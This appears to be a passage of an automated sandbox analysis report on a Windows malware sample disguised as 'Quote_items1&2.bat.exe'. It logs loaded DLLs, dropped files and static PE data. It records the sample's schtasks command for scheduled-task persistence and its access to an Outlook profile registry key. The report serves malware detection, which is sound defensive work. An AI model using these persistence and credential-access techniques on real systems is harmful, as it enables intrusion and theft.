                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpFBBB.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess created: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Quote_items1&2.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Quote_items1&2.bat.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: Quote_items1&2.bat.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: Quote_items1&2.bat.exeStatic file information: File size 1113600 > 1048576
                Source: Quote_items1&2.bat.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x10d400
                Source: Quote_items1&2.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Quote_items1&2.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: System.Windows.Forms.pdb source: Quote_items1&2.bat.exe, 00000000.00000002.2323496123.000000000125F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdbt source: Quote_items1&2.bat.exe, 00000000.00000002.2323496123.000000000125F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: uyCa.pdb% source: Quote_items1&2.bat.exe, 00000000.00000002.2333448655.000000001C83A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: uyCa.pdbSHA256: source: Quote_items1&2.bat.exe, wJFLKBSbTtvP.exe.0.dr
                Source: Binary string: .Forms.pdb source: Quote_items1&2.bat.exe, 00000000.00000002.2333448655.000000001C83A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: uyCa.pdb source: Quote_items1&2.bat.exe, wJFLKBSbTtvP.exe.0.dr
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 0_2_00007FFD344E00BD pushad ; iretd 0_2_00007FFD344E00C1
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 10_2_00007FFD34500D28 push es; ret 10_2_00007FFD34500D27
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 10_2_00007FFD34500CDC push es; ret 10_2_00007FFD34500D27
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 10_2_00007FFD34500C90 push edx; ret 10_2_00007FFD34500CDB
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 10_2_00007FFD345000BD pushad ; iretd 10_2_00007FFD345000C1
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 10_2_00007FFD34511078 push eax; retf 10_2_00007FFD34511079
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 12_2_00007FFD345000BD pushad ; iretd 12_2_00007FFD345000C1
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 15_2_00007FFD34510D28 push es; ret 15_2_00007FFD34510D27
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 15_2_00007FFD34510CDC push es; ret 15_2_00007FFD34510D27
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 15_2_00007FFD34510C90 push edx; ret 15_2_00007FFD34510CDB
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 15_2_00007FFD345100BD pushad ; iretd 15_2_00007FFD345100C1
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 15_2_00007FFD34521078 push eax; retf 15_2_00007FFD34521079
                Source: Quote_items1&2.bat.exeStatic PE information: section name: .text entropy: 7.790391261864803
                Source: wJFLKBSbTtvP.exe.0.drStatic PE information: section name: .text entropy: 7.790391261864803
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeFile created: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
